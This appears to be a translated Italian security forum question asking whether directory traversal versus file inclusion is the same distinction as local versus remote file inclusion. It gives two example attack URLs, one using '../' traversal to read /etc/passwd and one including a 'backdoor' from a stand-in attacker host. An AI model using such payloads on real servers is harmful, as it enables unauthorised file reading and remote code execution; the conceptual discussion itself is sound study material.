Basato su questa domanda precedente , sembra che la differenza tra l'attraversamento della directory e l'inclusione dei file sia la seguente:
Attraversamento directory
- La convalida errata dell'input dell'utente conduce a accesso in lettura della risorsa server .
- Esempio:
http://www.example.com?file=../../etc/passwd
Inclusione file
- La convalida errata dell'input dell'utente porta a il caricamento di una risorsa esterna nel server e l'esecuzione in esso .
- Esempio:
http://www.example.com/vuln_page.php?file=http://www.hacker.com/backdoor
Questo link , tuttavia, descrive questi concetti usando le parole inclusione file locale e inclusione file remoto .
Quindi, è il primo esempio
- directory traversal e inclusione file
lo stesso del secondo esempio
- inclusione di file locali rispetto all'inclusione di file remoti
vale a dire. LFI / RFI è solo una terminologia diversa per la stessa cosa?